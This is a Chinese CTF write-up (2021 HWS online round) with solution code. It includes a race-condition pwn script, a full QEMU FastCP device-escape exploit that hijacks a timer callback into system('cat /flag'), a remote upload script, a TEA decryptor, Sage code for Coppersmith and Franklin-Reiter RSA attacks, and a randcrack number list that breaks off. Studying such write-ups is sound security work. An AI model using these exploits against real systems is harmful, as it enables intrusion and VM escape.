2021HWS线上赛-WP

shop

存在条件竞争,可以多次卖出高价值物品,重复即可得到249元从而购买flag。

from pwn import *
# NOTE(review): the local process handle below is replaced by the remote
# connection on the very next line, so the spawned ./pwn is never used or
# closed by this script.
p = process("./pwn")
p = remote("node4.buuoj.cn","27664")


def _send_field(text):
    """Send *text* padded with NUL bytes to 0xf characters, then a newline."""
    p.sendline(text.ljust(0xf,'\x00'))


def buy(idx):
    """Send menu choice 2 followed by the item index."""
    _send_field("2")
    _send_field(str(idx))


def look():
    """Send menu choice 1."""
    _send_field("1")


def sell(idx):
    """Send menu choice 3 followed by the item index."""
    _send_field("3")
    _send_field(str(idx))


# The requests are written back-to-back with no recv in between. The write-up
# attributes the result to a race condition in the service's sell path; the
# service-side remedy would be to make the ownership check and the balance
# credit a single atomic step (presumably a missing lock -- confirm against
# the binary).
buy(2)
sell(2)
buy(1)
sell(2)
# Left disabled by the author:
#sleep(1)
#buy(1)
look()
p.interactive()
#flag{97d3afe8-8139-4219-801c-4f25418e73ac}

FastCP

qemu题目,根据launch.sh文件中--device FastCP确定关键词,再通过在ida里面搜索即可得到相关函数。

漏洞点存在于fastcp_cp_timer函数中:

  • 当cmd为4时,可以读取超出CP_buffer范围得到cp_timer函数指针的值
  • 当cmd为1且CP_list_cnt大于0x10时,可以覆盖到cp_timer函数指针及其参数的地址

通过cmd为4进行泄漏,得到pie基址和CP_buffer的地址;再通过cmd为1将cp_timer函数指针覆盖为system函数地址,并将其参数覆盖为CP_buffer上存放命令字符串的地址,再次触发cp_timer即可获取flag。

exp:


#include <inttypes.h>
#include <sys/mman.h>
#include <sys/types.h>

/* 4 KiB pages: used to split an address into page frame number and in-page offset. */
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
/* Layout of a 64-bit /proc/self/pagemap entry: bit 63 = page present,
   bits 0-54 = page frame number. */
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
/* Mapping of the device's MMIO region; assigned in main(). */
unsigned char* mmio_mem;
/* One-page buffer that main() fills with a struct cpu_info descriptor. */
char *userbuf;
/* Two-page buffers used as copy destination and copy source in main(). */
char *dst;
char *src;
/* Guest-physical addresses of the buffers above; the "2" variants are the
   addresses of the second page of dst / src. */
uint64_t phy_userbuf;
uint64_t phy_dst;
uint64_t phy_dst2;
uint64_t phy_src;
uint64_t phy_src2;
/* Base address computed in main() from the leaked pointer. */
uint64_t pie_base;
/* Not referenced anywhere in the visible code. */
uint64_t libc_base;

/*
 * Minimal syscall stubs, needed because the program is linked with -nostdlib
 * (see the build command in the upload script). Each stub loads an x86-64
 * Linux syscall number into rax and executes `syscall`; arguments are assumed
 * to already sit in the registers the C calling convention put them in.
 * None of the stubs has a C prototype, so the compiler treats their return
 * value as int.
 */
asm(
/* 59 = execve */
"execve:\n"
"mov $59,%rax\n"
"syscall\n"
"ret\n"

/* 2 = open */
"open:\n"
"mov $2,%rax\n"
"syscall\n"
"ret\n"

/* 0 = read */
"read:\n"
"mov $0,%rax\n"
"syscall\n"
"ret\n"

/* 1 = write */
"write:\n"
"mov $1,%rax\n"
"syscall\n"
"ret\n"

/* 60 = exit */
"exit:\n"
"mov $60,%rax\n"
"syscall\n"
"ret\n"

/* 9 = mmap. The fourth argument arrives in rcx under the function-call ABI
   but the kernel expects it in r10, hence the push/pop. */
"mmap:\n"
"push %rcx\n"
"pop %r10\n"
"mov $9,%rax\n"
"syscall\n"
"ret\n"

/* 230 = clock_nanosleep on x86-64, not a libc-style sleep(seconds).
   NOTE(review): callers pass only the integer 1, so this presumably returns
   an error immediately and the polling loops in main() simply spin -- confirm. */
"sleep:\n"
"mov $230,%rax\n"
"syscall\n"
"ret\n"

/* 8 = lseek */
"lseek:\n"
"mov $8,%rax\n"
"syscall\n"
"ret\n"

/* 3 = close */
"close:\n"
"mov $3,%rax\n"
"syscall\n"
"ret\n"

/* 149 = mlock */
"mlock:\n"
"mov $149,%rax\n"
"syscall\n"
"ret\n"
);

/*
 * Request descriptor that main() writes into userbuf before handing the
 * buffer's guest-physical address to the device. main() stores a
 * guest-physical source address, a count and a guest-physical destination
 * address in it.
 * NOTE(review): the field order is presumably dictated by the device model;
 * confirm against the device source.
 */
struct cpu_info{
    uint64_t CP_list_src;   /* guest-physical address of the source buffer */
    uint64_t CP_list_cnt;   /* count for the copy (0x100 / 0x1020 in main) */
    uint64_t CP_list_dst;   /* guest-physical address of the destination buffer */
};

/* Return the offset of addr inside its 4 KiB page (the low PAGE_SHIFT bits). */
uint64_t page_offset(uint64_t addr)
{
    uint64_t in_page_mask = PAGE_SIZE - 1;

    return addr & in_page_mask;
}

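/*
 * Translate a virtual address of this process to its page frame number by
 * reading the matching 8-byte entry of /proc/self/pagemap.
 *
 * Returns the frame number, or (uint64_t)-1 when the pagemap file cannot be
 * opened, the entry cannot be read in full, or the page is not present.
 * The descriptor is closed on every path; the original returned early on a
 * non-present page without closing it and used the entry even when open()
 * or read() had failed.
 */
uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme = 0, gfn;
    size_t offset;

    int fd = open("/proc/self/pagemap", 0);
    if (fd < 0)
        return -1;

    /* One 8-byte entry per 4 KiB page: (addr >> 12) * 8, i.e. addr >> 9
       with the low three bits cleared. */
    offset = ((uintptr_t)addr >> 9) & ~7;
    /* The lseek result is deliberately not tested: without a prototype it is
       truncated to int and large offsets would look negative. A failed seek
       is caught by the short-read check instead. */
    lseek(fd, offset, 0);
    if (read(fd, &pme, 8) != 8) {
        close(fd);
        return -1;
    }
    close(fd);

    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}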

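/*
 * Translate a virtual address of this process to a physical address:
 * page frame number shifted up by PAGE_SHIFT, OR-ed with the in-page offset.
 *
 * Returns (uint64_t)-1 when the frame lookup fails. The original shifted the
 * failure sentinel like a real frame number (its assert was commented out),
 * which produced a plausible-looking but meaningless address.
 */
uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn = gva_to_gfn(addr);

    if (gfn == (uint64_t)-1)
        return (uint64_t)-1;
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}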

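/*
 * Store a 64-bit value to the device register at byte offset addr inside the
 * mapped MMIO region.
 *
 * The store goes through a volatile pointer: register accesses have side
 * effects outside the program, so the compiler must not merge, reorder away
 * or drop them. The original used a plain pointer.
 */
void mmio_write(uint64_t addr, uint64_t value)
{
    *((volatile uint64_t*)(mmio_mem + addr)) = value;
}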

/* Write value to the register at MMIO offset 8; main() passes the
   guest-physical address of the descriptor buffer here. */
void set_cp_list_src(uint64_t value)
{
    const uint64_t reg_offset = 8;

    mmio_write(reg_offset, value);
}

/* Write value to the register at MMIO offset 16 (the count register, going
   by the function name). */
void set_cp_list_cnt(uint64_t value)
{
    const uint64_t reg_offset = 16;

    mmio_write(reg_offset, value);
}

/* Write a command number to the register at MMIO offset 24; main() then
   polls the same offset through read_cmd(). */
void do_cp(uint64_t value)
{
    const uint64_t reg_offset = 24;

    mmio_write(reg_offset, value);
}

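/*
 * Load a 64-bit value from the device register at byte offset addr inside
 * the mapped MMIO region.
 *
 * The load goes through a volatile pointer so that polling loops such as
 * `while (read_cmd())` re-read the register on every iteration; with the
 * original plain pointer the compiler was free to hoist the load out of the
 * loop.
 */
uint64_t mmio_read(uint64_t addr)
{
    return *((volatile uint64_t*)(mmio_mem + addr));
}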
/* Read the register at MMIO offset 24, the offset do_cp() writes to. */
uint64_t read_cmd()
{
    uint64_t cmd_reg = mmio_read(24);

    return cmd_reg;
}
/* Read the register at MMIO offset 8, the offset set_cp_list_src() writes to. */
uint64_t read_cp_list_src()
{
    uint64_t src_reg = mmio_read(8);

    return src_reg;
}
/* Read the register at MMIO offset 0 (a "handling" flag, going by the name). */
uint64_t read_handling()
{
    uint64_t handling_reg = mmio_read(0);

    return handling_reg;
}
/* Read the register at MMIO offset 16, the offset set_cp_list_cnt() writes to. */
uint64_t read_cp_list_cnt()
{
    uint64_t cnt_reg = mmio_read(16);

    return cnt_reg;
}
/*
 * Guest-side program for the FastCP challenge device. It maps the device's
 * MMIO region, prepares physically contiguous DMA buffers, and then issues
 * the command sequence the write-up describes: command 4 to read past the
 * end of CP_buffer, command 1 with a count above 0x10 to write past it.
 *
 * Root cause as stated in the write-up: fastcp_cp_timer does not keep the
 * copy within CP_buffer, so the cp_timer callback pointer and its argument,
 * which apparently sit directly behind the buffer, are readable and
 * writable from the guest. The device-side fix is to bound both the length
 * and CP_list_cnt before copying.
 *
 * NOTE(review): the function falls off its end without calling exit(); with
 * `-e main -nostdlib` there is no caller to return to -- confirm behaviour.
 */
int main(int argc, char *argv[])
{
    write(1,"start\n",6);
    // Open and map BAR0 of PCI device 00:04.0. 0x101002 is O_RDWR|O_SYNC on
    // x86-64 Linux. (The earlier wording of this comment named the "strng"
    // device, apparently left over from another exploit template.)
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", 0x101002);//fea00000

    // prot 3 = PROT_READ|PROT_WRITE, flags 1 = MAP_SHARED.
    // NOTE(review): neither open() nor mmap() is checked for failure.
    mmio_mem = mmap(0, 0x1000, 3, 1, mmio_fd, 0);

    //printf("mmio_mem @ %p\n", mmio_mem);
    // Allocate DMA buffer and obtain its physical address.
    // flags 33 = MAP_SHARED|MAP_ANONYMOUS; mlock keeps the page resident so
    // the pagemap translation stays valid.
    userbuf = mmap(0, 0x1000, 3, 33, -1, 0);

    mlock(userbuf, 0x1000);
    phy_userbuf=gva_to_gpa(userbuf);
    //printf("user buff virtual address: %p\n",userbuf);
    //printf("user buff physical address: %p\n",(void*)phy_userbuf);
    // Retry until the two pages of dst are physically adjacent: the device
    // is given one physical base address and the later requests use a count
    // of 0x1020, which crosses the page boundary. Rejected mappings are not
    // unmapped.
    do{
        dst = mmap(0, 0x2000, 3, 33, -1, 0);
        mlock(dst, 0x2000);
        phy_dst=gva_to_gpa(dst);
        phy_dst2=gva_to_gpa(dst+0x1000);
    }while((phy_dst2 - phy_dst != 0x1000));
    //printf("user buff virtual address: %p\n",dst);
    //printf("user buff physical address: %p\n",(uint64_t*)phy_dst);
    //printf("user buff physical address2: %p\n",(uint64_t*)phy_dst2);


    // Same contiguity requirement for the source buffer.
    do{
        src = mmap(0, 0x2000, 3, 33, -1, 0);
        mlock(src, 0x2000);
        phy_src=gva_to_gpa(src);
        phy_src2=gva_to_gpa(src+0x1000);
    }while((phy_src2 - phy_src != 0x1000));
    //printf("user buff virtual address: %p\n",src);
    //printf("user buff physical address: %p\n",(uint64_t*)phy_src);
    //printf("user buff physical address2: %p\n",(uint64_t*)phy_src2);

    write(1,"step2\n",6);

    // `index` is never used.
    int index = 0;
    // First request: an in-bounds descriptor (count 0x100).
    ((struct cpu_info*)userbuf)->CP_list_src= phy_src;
    ((struct cpu_info*)userbuf)->CP_list_cnt= 0x100;
    ((struct cpu_info*)userbuf)->CP_list_dst= phy_dst;
    ((uint64_t*)src)[0]=0x123456;
    ((uint64_t*)src)[1]=0x123456;
    //0x7f3fd4000000

    // Issue command 2 and wait until the command register reads back 0.
    // NOTE(review): the write-up does not say what command 2 does; presumably
    // it fills CP_buffer from src -- confirm against the device code.
    set_cp_list_cnt(1);
    set_cp_list_src(phy_userbuf);
    do_cp(2);
    while(read_cmd()){
        sleep(1);
    }

    // Second request: count 0x1020. Per the write-up, command 4 copies out
    // of CP_buffer without a bound, so bytes behind the buffer end up in dst.
    ((struct cpu_info*)userbuf)->CP_list_cnt= 0x1020;

    set_cp_list_src(phy_userbuf);

    do_cp(4);
    sleep(1);
    while(read_cmd()){
        sleep(1);
    }

    // The qword at dst+0x1010 is treated as the cp_timer callback pointer;
    // 0x4dce80 is its offset inside the QEMU binary used by the challenge.
    pie_base = *(uint64_t*)(dst+0x1010) - 0x4dce80;
    //printf("pie_base : %p\n",pie_base);

    // Emits the 8 raw bytes of pie_base, not a formatted number.
    write(1,&pie_base,8);
    write(1,"step3\n",6);

    // 0x2C2180 is the binary-specific offset the author uses for system().
    uint64_t system = 0x2C2180 + pie_base;
    // The qword at dst+0x1018 is treated as the callback's argument pointer.
    uint64_t sh = (*(uint64_t*)(dst+0x1018));
    ((struct cpu_info*)userbuf)->CP_list_src= phy_src;
    ((struct cpu_info*)userbuf)->CP_list_cnt= 0x1020;
    ((struct cpu_info*)userbuf)->CP_list_dst= phy_dst;

    // Copy the four leaked qwords back so the fields that are not being
    // changed keep their values, then replace callback and argument.
    (*(uint64_t*)(src+0x1000))=(*(uint64_t*)(dst+0x1000));
    (*(uint64_t*)(src+0x1008))=(*(uint64_t*)(dst+0x1008));
    (*(uint64_t*)(src+0x1010))=(*(uint64_t*)(dst+0x1010));
    (*(uint64_t*)(src+0x1018))=(*(uint64_t*)(dst+0x1018));
    (*(uint64_t*)(src+0x1010))=system;
    // NOTE(review): 0xa00+0x100 is presumably the distance from the leaked
    // argument pointer to CP_buffer+0x100 -- confirm against the device state
    // layout.
    (*(uint64_t*)(src+0x1018))=sh+0xa00+0x100;
    // Command string at offset 0x100. No terminator is written; it relies on
    // the anonymous mapping being zero-filled.
    (*(char*)(src+0x100))='c';
    (*(char*)(src+0x101))='a';
    (*(char*)(src+0x102))='t';
    (*(char*)(src+0x103))=' ';
    (*(char*)(src+0x104))='/';
    (*(char*)(src+0x105))='f';
    (*(char*)(src+0x106))='l';
    (*(char*)(src+0x107))='a';
    (*(char*)(src+0x108))='g';
    // Count 0x11: per the write-up, command 1 with CP_list_cnt above 0x10
    // writes past CP_buffer into the callback pointer and its argument.
    set_cp_list_cnt(0x11);
    set_cp_list_src(phy_userbuf);

    do_cp(1);
    while(read_cmd()){
        sleep(1);
    }

    //printf("system_addr : %p\n",*(uint64_t*)(dst));
    // Issue the command once more so the timer callback runs again, now
    // through the replaced pointer ("再次执行" in the write-up).
    do_cp(1);

}

上传:

#!/usr/bin/env python2
# encoding: utf-8

from pwn import *
import base64
import sys
import os
context.log_level = 'debug'

# Build a static, libc-free binary with main as the entry point, then shrink
# it so that fewer shell lines are needed for the transfer.
for build_cmd in ('gcc -e main -static ./exp.c -o ./exp -nostdlib',
                  'strip ./exp',
                  'upx ./exp'):
    os.system(build_cmd)

with open("exp", "rb") as f:
    exp = f.read()
print(len(exp))
step = 0x200   # raw bytes per transferred chunk

r = remote('118.195.171.57', 443)


def _at_prompt(cmd):
    """Wait for the next '#' shell prompt, then send one command line."""
    r.recvuntil('#')
    r.sendline(cmd)


r.recvuntil('VMEscape login:')
r.sendline('root')
_at_prompt('')

log.info('uploading...')
# Python 2 integer division. When len(exp) is an exact multiple of step the
# last chunk is empty and only appends a blank line to the file.
chunk_count = len(exp)/step+1
for i in range(0, chunk_count):
    b64_exp = base64.b64encode(exp[step*i:step*(i+1)])
    _at_prompt('echo %s >> ./b64_exp'%b64_exp)
log.success('upload success')

_at_prompt('base64 -d ./b64_exp > ./exp')
# NOTE(review): mode 777 is broader than the execute permission actually
# needed here.
_at_prompt('chmod 777 exp')
_at_prompt('./exp')

r.interactive()

aet-reverse

tea加密相关的,抄代码,然后将顺序调换即可:

int decode(int a2)
{
int v4; // [esp+8h] [ebp-28h]
int v5; // [esp+Ch] [ebp-24h]
int v6; // [esp+10h] [ebp-20h]
int v7; // [esp+14h] [ebp-1Ch]
unsigned int j; // [esp+1Ch] [ebp-14h]
unsigned int i; // [esp+20h] [ebp-10h]
int v10; // [esp+24h] [ebp-Ch]
unsigned int v11; // [esp+28h] [ebp-8h]
unsigned int v12; // [esp+2Ch] [ebp-4h]

v7 = (3 << 8) | (1 << 16) | (0 << 24) | 4;
v6 = (7 << 8) | (6 << 16) | (5 << 24) | 8;
v5 = (11 << 8) | (10 << 16) | (9 << 24) | 12;
v4 = (15 << 8) | (14 << 16) | (13 << 24) | 0;
for ( i = 0; 4 > i; ++i )
{
v10 = 0x20*0x9E3779B9;
v12 = ((*(char *)(8 * i + 2 + a2)&0xff) << 8) | ((*(char *)(8 * i + 1 + a2)&0xff) << 16) | ((*(char *)(8 * i + a2)&0xff) << 24) | (*(char *)(8 * i + 3 + a2))&0xff;
v11 = ((*(char *)(8 * i + 6 + a2)&0xff) << 8) | ((*(char *)(8 * i + 5 + a2)&0xff) << 16) | ((*(char *)(8 * i + 4 + a2)&0xff) << 24) | (*(char *)(8 * i + 7 + a2)&0xff);
for ( j = 0; j <= 0x1F; ++j )
{
v11 -= (v12 + v10) ^ (16 * v12 + v5) ^ ((v12 >> 5) + v4);
v12 -= (v11 + v10) ^ (16 * v11 + v7) ^ ((v11 >> 5) + v6);
v10 -= 0x9E3779B9;
}
*(char *)(8 * i + a2) = (v12/0x1000000)&0xff;
*(char *)(8 * i + 1 + a2) = (v12/0x10000)&0xff;
*(char *)(8 * i + 2 + a2) = (v12/0x100)&0xff;
*(char *)(8 * i + 3 + a2) = (v12)&0xff;
*(char *)(8 * i + 4 + a2) = (v11/0x1000000)&0xff;
*(char *)(8 * i + 5 + a2) = (v11/0x10000)&0xff;
*(char *)(8 * i + 6 + a2) = (v11/0x100)&0xff;
*(char *)(8 * i + 7 + a2) = (v11)&0xff;
}
return 0;
}
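/*
 * Ciphertext buffer. The literal below is 32 bytes long and strcpy() appends
 * a terminating NUL, so 33 bytes are needed; with the original char a[0x20]
 * the copy wrote one byte past the array, and printf("%s") depends on that
 * terminator being there.
 */
char a[0x20 + 1];

/*
 * Print the ciphertext, decrypt it in place with decode(), print the result.
 * NOTE(review): decode() receives the buffer address through an int
 * parameter, so this is presumably meant to be built as a 32-bit program.
 */
int main(){
    strcpy(a,"\x42\xC7\xCA\x40\xC1\x75\x16\xEF\xE7\x37\x6E\x69\x1B\x0B\x0F\x78\xDF\xE0\xE0\x7B\x5F\x50\x57\x05\xF4\x73\xD2\x35\x47\xD5\x6C\x5A");
    printf("%s\n",a);
    decode(a);
    printf("%s\n",a);
}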

backdoor

根据题目提示直接搜索rootkit即可在附近发现flag:

image-20210823152243990

hello

流量包中可以发现两个密文:

image-20210823152307164

因为两段明文只是padding不同,且padding位数较短,可以先用Coppersmith短填充攻击求出两者的差值,再用Franklin-Reiter相关消息攻击恢复明文,在sage上执行代码即可获得flag

#脚本2
#Sage
import binascii
def short_pad_attack(c1, c2, e, n):
    """Return the small difference between two plaintexts encrypted under (n, e).

    Models the ciphertexts as x^e = c1 and (x + y)^e = c2 modulo n,
    eliminates x with a resultant, and looks for a small root y of the
    resulting univariate polynomial.

    Raises IndexError when small_roots() finds no root.

    This only works because the exponent is small and the two messages
    differ by a short pad; randomized padding such as RSA-OAEP removes that
    relation.
    """
    PRxy.<x,y> = PolynomialRing(Zmod(n))
    PRx.<xn> = PolynomialRing(Zmod(n))
    PRZZ.<xz,yz> = PolynomialRing(Zmod(n))
    g1 = x^e - c1
    g2 = (x+y)^e - c2
    q1 = g1.change_ring(PRZZ)
    q2 = g2.change_ring(PRZZ)
    # Resultant of the two polynomials: a polynomial in one variable that
    # vanishes at the sought difference.
    h = q2.resultant(q1)
    h = h.univariate_polynomial()
    h = h.change_ring(PRx).subs(y=xn)
    h = h.monic()
    # Search bound: roots below 2^(bitlen(n) // (2*e^2)).
    kbits = n.nbits()//(2*e*e)
    diff = h.small_roots(X=2^kbits, beta=0.4)[0] # find root < 2^kbits with factor >= n^0.4
    return diff
def related_message_attack(c1, c2, diff, e, n):
    """Recover the plaintext m from c1 = m^e and c2 = (m + diff)^e modulo n.

    Both x^e - c1 and (x + diff)^e - c2 have m as a root, so their
    polynomial GCD over Zmod(n) contains the factor (x - m).

    Returns the negated constant term of the monic GCD.
    NOTE(review): that equals m only when the GCD is linear -- the code does
    not check the degree.
    """
    PRx.<x> = PolynomialRing(Zmod(n))
    g1 = x^e - c1
    g2 = (x+diff)^e - c2
    def gcd(g1, g2):
        # Plain Euclidean algorithm on polynomials; the result is made monic.
        while g2:
            g1, g2 = g2, g1 % g2
        return g1.monic()
    return -gcd(g1, g2)[0]
if __name__ == '__main__':
    # c1, c2: the two ciphertexts the write-up says were found in the capture.
    c1 =226199888918448644756982227968746328321985116022301858554198443672166664046511192215268564345898426376094090283902459640110441636420726770010000770994806563185277269200465979320365589893377418069091918532090442396603886751603663167305733566867710881487792435263851954036765024355077627565776101657845285994047225127259478223888842725657697619882058952675576467950522546405944727325816748748400930757072151974753803411875075825410215662132323783283622907642504349895222420194846774972358784353404930471430363282533597528847457511272893938256828008761907527515772662467469811929535936626565593800263948227574689518705440414368634213587105988741446978367368641973256822769215908784220309789734449328751828411012817796805182907296099522060377249696752489510340595152805018457215119257756500416362241433542631282380670560802965990054464183825706649810872267539076088793023183611390929368000088538174212497557317021558232130649505658714311457845634746833717519922531826151283006638342214774466523934632839617828984102088907011083393633695252458688340500110194100303563736683350582103762865754280928068416609493507422758397519930389697891015054896887103350205876203508540259064385048758693455947681367170495861484799223471818419141809766082
    c2 =207745134179372733555510206619693253104579843394896629739037329373112962626246001660692996105153219118802888232147542928402067843843528586661320609669764821619654148259323979346482619518127693134276997096465301242211338219230471535362522814373937363157952621289752500159789059618277078792730676938098151778724478618510442014061057398587899271302933994977686954557140792181120737121774640968270568182678321489463357386240195482174580855571460603588887113368877542370808084357842481355072918452814741564939655765498035870034623573615277107259501397135275787715228937905326258102800307298720705403841763666842176243959137647629868288744563301081604801635616954497347143042211051515138964208862089552048752128912810909730479659450966735343696566762894334249104817494914722566979492521404452789748171845406174662299522224640406957367515731398609433619859550730046552804426613174272338408295496475455377327126232203966170727191424458552984898420495331422888174501682405492889556485885498653026394829501033795561393942827468916484256939660461234831948497296037001984268948594694380490331513700030501310813656424424549981824937813623457529801230191235415350842735918693953674061739761952989693408739389294218794993885245118233185798993030811
    # n, e: RSA public modulus and exponent.
    n =614841097302605203729955929451825826385630731245407304765444050136152160075416270232196891310754756560269306196561606156336813576913594854840164982931848631424774407292521710362012687934093478900284954122708280664707569091235654868301000525395360078939629380968427451630817415966643152395544725253378817336057650951709472150327395955690738068905556599556048143267959045123493403335580464278218470115001795745184558268225092224619641577591099718668732317701349174398992357749748300972812469018580873052325022765470680889385640174127657770334108999912438577122235575684290868585158464471335044106696596310903161046624897870198499582743991296379992702316645220124590338066703166528127792814503559512520239899562796644117918668854617138574268684819163423283186676870272524173353359508565110680846340027745804501343277615801570161341159399030712301208921532219260984718701528073369562514559969874210515647810613697008011307213411257388079256334292994617864207389735727092704030522132125141994059978274145655095107101848352464355417969218835698138188967409918358594915938655738516761338882364547606993485361276412819595508391665123030799494192932148904512867616718323946620838822942360634114453262536609403878810013093786418173028142285209
    e =7
    # Step 1: recover the small difference between the two padded plaintexts.
    diff = short_pad_attack(c1, c2, e, n)
    # Step 2: with the difference known, recover the first plaintext.
    m1 = related_message_attack(c1, c2, diff, e, n)
    # Render the integer as hex and decode it to bytes for printing.
    print(binascii.unhexlify("%x" % int(m1)))

'''
b'You are so good at Coppersmith! Here is flag: flag{congratulations_let#s_hacK_4_fun}J"\xdd\x03'
'''

prophet

压缩包的密码是压缩包名,写个脚本循环解压:

import zipfile
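# Walk a chain of nested archives. Per the write-up, each archive is
# encrypted with its own file name (without the extension) and contains the
# next archive; the chain is followed until "unknown.zip" appears.
#
# extractall() writes whatever the archive contains into the current
# directory, so run this in a scratch directory when the archives are not
# trusted.
SUFFIX = ".zip"
filename = "2907706324.zip"
data = []
while filename.endswith(SUFFIX) and filename != "unknown.zip":
    # Cut the suffix off explicitly. str.strip(".zip") removes any of the
    # characters '.', 'z', 'i', 'p' from both ends rather than the suffix,
    # which was only correct because the names here are all digits.
    stem = filename[:-len(SUFFIX)]
    data.append(stem)
    # The context manager closes each archive; the original left one open
    # file handle behind per layer.
    with zipfile.ZipFile(filename) as archive:
        next_file = archive.namelist()[0]
        archive.extractall(pwd=bytes(stem, encoding='ascii'))
    filename = next_file
# The collected names are the number sequence used in the next step.
print(data)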

最后会解压到 unknown.zip。前面各层压缩包的密码(即文件名)都是随机数,整理后得到如下序列,可以用 Python 的 randcrack 库根据它预测后续的随机数:

2907706324, 3954914986, 3402108112, 2054213659, 535557466, 3669544554, 2651712950, 3417770286, 4111425735, 3450915372, 3509237967, 2707743668, 889955106, 101861478, 1336215387, 3605515990, 2504989551, 1349201253, 2648082710, 2601629531, 318049225, 645746114, 3181236701, 1354915347, 4222461704, 843752451, 304987850, 818779778, 2376864436, 4258684562, 3790514089, 2536866185, 3429670676, 700863894, 2368789662, 2954948787, 1850501693, 1935300318, 4294954886, 73605939, 790901430, 3142640071, 3691984007, 1373060993, 903416285, 3121969731, 1482630290, 3383153547, 4063302022, 3991027797, 4137420745, 3132346033, 1308129484, 3547926414, 3109764388, 708591644, 1817081225, 2668947004, 4263919904, 1115482359, 3856868064, 2830700281, 2281684679, 690656972, 1556659173, 3404632260, 3760484167, 1087153620, 4194906349, 1078862195, 2976233215, 1912726912, 30407312, 3942988489, 3908451981, 3898279239, 3281283879, 3497758064, 2782905320, 2430005846, 2035396750, 4225190092, 2269868098, 3586253265, 941460198, 714278381, 3535781796, 224084415, 1439629664, 4073938538, 3695945333, 3790821082, 1641312648, 3482321608, 3915303085, 1915159805, 3430976961, 1840044358, 3171835875, 2774047027, 1987332515, 3855846206, 2973653262, 3838867780, 611114104, 226329481, 1915513324, 3700256481, 43035897, 497049019, 4217044844, 2614275824, 744712097, 182795116, 2163976688, 4263470614, 725414906, 921626470, 3746191361, 1308296962, 1147642242, 4092217985, 3542284802, 1521845264, 2075371081, 816611597, 3041634562, 233907246, 1795167862, 3915308548, 491352142, 930583074, 1708980296, 308506013, 3810969309, 3157296753, 2967229333, 1571219325, 1291393249, 1593315655, 3882964486, 1017041435, 1857378099, 1824352034, 3349753470, 674061228, 1009504030, 2542637984, 371165771, 2479782679, 1480344967, 2869593526, 1330829984, 2722781682, 283801038, 3707346602, 4001933200, 2349491114, 1250027640, 1970245425, 171593507, 826464228, 2984624889, 1700335730, 1127890176, 2298521410, 3038015291, 3114969709, 2198496951, 
3020449005, 2670289699, 1384619269, 691171966, 3223611927, 2151567537, 1625186327, 2435311123, 3729455475, 2620432733, 3211878875, 241902387, 422789850, 1633356868, 244191996, 499735365, 764962662, 1681584826, 427035682, 880783233, 1389830348, 1256307054, 1454192222, 3867551829, 1911723809, 394921086, 1072555848, 3834541849, 2720240412, 4083254853, 1463684341, 2807310132, 3989708760, 4287462606, 4065391879, 2946216593, 4274887668, 960363676, 3337566213, 2138750961, 3655949854, 138734513, 128284098, 1062990215, 3761988182, 1513533102, 845839023, 1734162676, 3029907057, 3437833787, 3858879164, 2270111112, 1830381909, 1534981723, 622364075, 2734894006, 3830057679, 550477468, 2555713963, 2687705967, 397294684, 3910881510, 3725223603, 2429728499, 1711990756, 4237787834, 2814436797, 2366793701, 868414597, 2185265697, 4003527750, 510159467, 281768698, 2839069975, 414584629, 841160842, 2248608666, 3581589648, 3224270545, 2113148121, 1552518857, 3606499351, 3204575349, 1595467803, 2880744010, 1317665514, 3437941254, 110923457, 278638319, 2683805720, 2816402957, 2117760685, 4054884851, 760362861, 2010439063, 3484464314, 302788119, 1394375925, 3571572324, 2666609477, 1853851652, 3970831431, 2738683685, 2259326865, 3704336022, 1519256231, 3644881529, 104403453, 1142252920, 2572082756, 2489933602, 2709723501, 186737154, 980884132, 1865172639, 2329728320, 3876911386, 3201931453, 2772783460, 661942251, 2402901175, 3570219339, 549076455, 1690874019, 2055566646, 2662268000, 4183765260, 1452482414, 2583855929, 948034686, 2853630447, 664902618, 2764279019, 740228037, 679334472, 1068533991, 1825024640, 105521362, 2758306319, 1561107818, 2855860411, 3944090887, 1155572417, 2222936476, 2982018743, 3826797015, 993277428, 3606014829, 2651099474, 183026480, 3850093664, 1946575336, 1458018383, 919408507, 3035932662, 666805284, 2368179406, 293503818, 306642195, 1174454622, 147082512, 3045274465, 1118557200, 2280283457, 1140154721, 1589304916, 2707734613, 2687607369, 3181595711, 1786880670, 
614492265, 1727186681, 616992393, 2647336831, 1328574427, 3419233391, 86915267, 791316613, 2947942465, 1207262633, 4032471359, 110173792, 580028332, 3200100754, 1443892133, 4158469394, 2866259043, 1777066304, 2631121839, 3066797076, 913793049, 500723146, 4250565153, 3140000049, 4006124671, 1557687908, 3097026744, 1600577917, 3475167182, 4190641526, 1975505102, 2746146674, 4183482895, 3942160073, 1130897678, 655001677, 1503469355, 1589952677, 289068625, 404635291, 546675708, 4243969683, 92985514, 435955479, 2070686379, 269130310, 2458267416, 230795995, 2268807924, 4152347460, 883606733, 3649663604, 1939496305, 3144082131, 1020316188, 3643489526, 991785797, 2377699574, 1064114897, 3925872718, 3153908492, 3402689587, 729363836, 3146706653, 422102318, 781824325, 2070158255, 3452344097, 1855915077, 278758154, 2809776511, 3655551017, 1427426112, 3686861685, 1715461553, 3169333119, 400766497, 849152388, 3842058653, 3324504004, 2110816760, 1993886168, 2469709606, 1634363898, 451167479, 1791892046, 3639050937, 3326490342, 3138524672, 3683265170, 1733092879, 3943402096, 3178043886, 3263958674, 2945303049, 4030290823, 3890019934, 4072034359, 1491936406, 61358117, 3877008624, 4128962903, 3153897248, 2029311561, 1711005874, 1555958789, 2460011603, 1480475039, 2029023339, 3898772821, 813779337, 3274928705, 122738867, 326424966, 2636370832, 3504714095, 4243999766, 2552626959, 1698341626, 1110935776, 3393273826, 3735680822, 3013017650, 3968600483, 3916227526, 4062882707, 4124072198, 2274124478, 2769833441, 2147761328, 3979664881, 591506957, 1000835552, 1953837853, 3630957255, 1526381419, 1320001636, 804577210, 2780887882, 57522122, 2034965857, 1092740256, 3343601480, 316588755, 856922510, 3000844043, 277993279, 2628947374, 2800837999, 3540281314, 1131935058, 2554699772, 2983012006, 3462033745, 3747092723, 2082631046, 1249369550, 1399656050, 1380244778, 3654315687, 30864042, 3601038453, 1812382865, 3977191364, 3375851263, 2615653275, 4121914158, 